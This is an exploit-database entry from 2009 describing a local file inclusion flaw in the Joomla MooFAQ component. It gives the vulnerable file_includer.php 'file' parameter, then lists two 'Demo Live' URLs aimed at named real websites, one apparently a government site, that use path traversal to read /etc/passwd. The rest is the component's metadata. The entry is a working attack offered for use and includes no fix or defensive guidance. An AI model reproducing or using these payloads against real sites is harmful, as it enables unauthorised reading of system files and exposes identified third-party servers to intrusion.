Joomla Component MooFAQ (com_moofaq) LFI Vulnerability

2009-06-08T00:00:00
ID 1337DAY-ID-5326
Type zdt
Reporter Chip D3 Bi0s
Modified 2009-06-08T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ======================================================
Joomla Component MooFAQ (com_moofaq) LFI Vulnerability
======================================================


----------------------------------------------------------------------
Joomla Component MooFAQ Local File Inclusion Vulnerability
----------------------------------------------------------------------

 ###################################################
 [+] Author        :  Chip D3 Bi0s
 [+] Vulnerability :  LFI
 ###################################################

________________________________________________________

Example:

http://localHost/path/components/com_moofaq/includes/file_includer.php?gzip=0&file=[LFI]


Demo Live (1):
http://www.paginaswebhonduras.com/components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../etc/passwd

Demo Live (2):
http://www.uers.gov.do/components/com_moofaq/includes/file_includer.php?gzip=0&file=/etc/passwd

++++++++++++++++++++++++++++++++
[!] Produced in South America
--------------------------------


<productName>FAQ Component using mooTools</productName>
<creationDate>20 July 2007</creationDate>
<version>1.0</version>
<joomlaVersion>1.0.13</joomlaVersion>
<author>Douglas Machado</author>
<authorName>Douglas Machado</authorName>
<authorEmail>[email protected]</authorEmail>
<authorUrl>opensource.focalizaisso.com.br</authorUrl>
<productPicture>config.png</productPicture>
<productUrl>http://opensource.focalizaisso.com.br/</productUrl>
<setupUrl>http://opensource.focalizaisso.com.br/</setupUrl>




#  0day.today [2018-02-19]  #